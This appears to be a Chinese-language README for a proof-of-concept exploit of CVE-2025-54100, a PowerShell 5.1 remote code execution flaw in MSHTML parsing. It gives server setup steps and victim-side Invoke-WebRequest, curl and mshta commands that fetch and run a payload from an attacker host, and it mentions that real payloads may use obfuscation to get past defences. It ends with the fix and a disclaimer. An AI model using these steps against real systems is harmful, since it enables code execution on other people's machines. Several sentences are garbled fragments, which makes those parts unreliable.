一个简洁的概念验证,展示CVE-2025-54100如何通过恶意HTML解析在Windows PowerShell 5.1中导致远程代码执行(RCE)。
-UseBasicParsing时,Invoke-WebRequest中的命令注入ActiveXObject)。CVE-2025-54100.py中的FastAPI服务器提供一个精心构造的HTML载荷。WScript.Shell / Shell.Application ActiveX对象。calc.exe演示RCE。python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
启动PoC HTTP服务器:
uvicorn app:app --host 0.0.0.0 --port 8888 --reload
在受影响(且未使用-UseBasicParsing)的Windows机器上运行以下命令:
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://<attacker-ip>:8888"
# curl alias
curl http://<attacker-ip>:8888
# mshta
mshta http://<attacker-ip>:8888
使用与服务器配置相同的端口。如果存在漏洞,嵌入的脚本将通过MSHTML解析器执行。某些防病毒产品可能会阻止此行为,即使解析问题仍然存在。
如果calc.exe未弹出:
-UseBasicParsing的Invoke-WebRequest。这展示了执行向量。现实世界的载荷可能使用混淆或额外的绕过技术来规避默认限制。

微软于2025年12月修复了此问题:
-UseBasicParsing 以避免MSHTML解析:
Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
[!WARNING] 仅用于教育和授权测试。请负责任地使用并遵守所有适用法律。作者不对滥用或损害负责。